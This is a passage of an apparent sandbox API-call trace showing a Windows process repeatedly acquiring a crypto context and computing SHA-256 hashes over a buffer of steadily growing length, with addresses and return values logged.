	[0250.369] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.369] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778d98
	[0250.369] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778d98, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778d98, pdwDataLen=0x128c3c) returned 1
	[0250.369] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.369] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.369] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.370] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.370] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0250.370] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.370] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778c30
	[0250.370] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778c30, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778c30, pdwDataLen=0x128c3c) returned 1
	[0250.370] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.370] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.370] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.370] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.370] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0250.370] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.370] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778bb8
	[0250.370] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778bb8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778bb8, pdwDataLen=0x128c3c) returned 1
	[0250.370] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.370] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.370] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.371] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.371] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0250.371] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.371] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778208
	[0250.371] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778208, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778208, pdwDataLen=0x128c3c) returned 1
	[0250.371] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.371] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.371] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.371] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.371] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0250.371] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.371] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777ee8
	[0250.371] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2777ee8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2777ee8, pdwDataLen=0x128c3c) returned 1
	[0250.371] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.371] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.371] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.372] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.372] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0250.372] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.372] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777f38
	[0250.372] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2777f38, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2777f38, pdwDataLen=0x128c3c) returned 1
	[0250.372] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.372] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.372] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.372] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.372] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0250.372] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.372] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778528
	[0250.372] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778528, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778528, pdwDataLen=0x128c3c) returned 1
	[0250.372] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.372] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.372] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.373] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.373] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0250.373] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.373] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778578
	[0250.373] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778578, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778578, pdwDataLen=0x128c3c) returned 1
	[0250.373] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.373] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.373] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.373] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.373] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0250.373] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.373] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27785c8
	[0250.373] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27785c8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27785c8, pdwDataLen=0x128c3c) returned 1
	[0250.373] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.373] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.373] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.374] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.374] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0250.374] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.374] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27785f0
	[0250.374] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27785f0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27785f0, pdwDataLen=0x128c3c) returned 1
	[0250.374] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.374] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.374] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.374] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.374] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0250.374] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.374] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777f10
	[0250.374] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2777f10, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2777f10, pdwDataLen=0x128c3c) returned 1
	[0250.374] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.374] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.374] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.375] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.375] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0250.375] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.375] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778708
	[0250.375] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778708, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778708, pdwDataLen=0x128c3c) returned 1
	[0250.375] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.375] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.375] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.375] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.375] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0250.375] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.375] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778118
	[0250.375] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778118, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778118, pdwDataLen=0x128c3c) returned 1
	[0250.375] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.375] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.375] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.376] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.376] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0250.376] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.376] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778320
	[0250.376] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778320, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778320, pdwDataLen=0x128c3c) returned 1
	[0250.376] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.376] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.376] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.376] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.376] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0250.376] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.376] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778348
	[0250.376] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778348, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778348, pdwDataLen=0x128c3c) returned 1
	[0250.376] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.376] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.376] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.377] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.377] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0250.377] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.377] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778370
	[0250.377] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778370, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778370, pdwDataLen=0x128c3c) returned 1
	[0250.377] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.377] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.377] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.377] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.377] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0250.377] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.377] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778168
	[0250.377] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778168, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778168, pdwDataLen=0x128c3c) returned 1
	[0250.377] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.377] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.377] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.378] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.378] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0250.378] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.378] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777dd0
	[0250.378] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2777dd0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2777dd0, pdwDataLen=0x128c3c) returned 1
	[0250.378] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.378] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.378] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.378] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.378] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0250.378] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.378] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777f88
	[0250.378] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2777f88, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2777f88, pdwDataLen=0x128c3c) returned 1
	[0250.378] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.378] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.378] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.379] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.379] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0250.379] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.379] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27784d8
	[0250.379] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27784d8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27784d8, pdwDataLen=0x128c3c) returned 1
	[0250.379] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.379] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.379] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.379] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.379] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0250.379] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.379] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778618
	[0250.379] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778618, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778618, pdwDataLen=0x128c3c) returned 1
	[0250.379] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.380] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.380] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.380] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.380] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0250.380] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.380] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778780
	[0250.380] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2778780, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778780, pdwDataLen=0x128c3c) returned 1
	[0250.380] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.380] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.380] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.381] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.381] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0250.381] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.381] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778488
	[0250.381] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778488, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778488, pdwDataLen=0x128c3c) returned 1
	[0250.381] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.381] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.381] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.381] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.381] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0250.381] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.381] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27786b8
	[0250.381] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27786b8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27786b8, pdwDataLen=0x128c3c) returned 1
	[0250.382] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.382] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.382] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.382] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.382] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0250.382] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.382] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778870
	[0250.382] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778870, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778870, pdwDataLen=0x128c3c) returned 1
	[0250.382] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.382] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.382] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.382] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.382] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0250.382] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.382] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778550
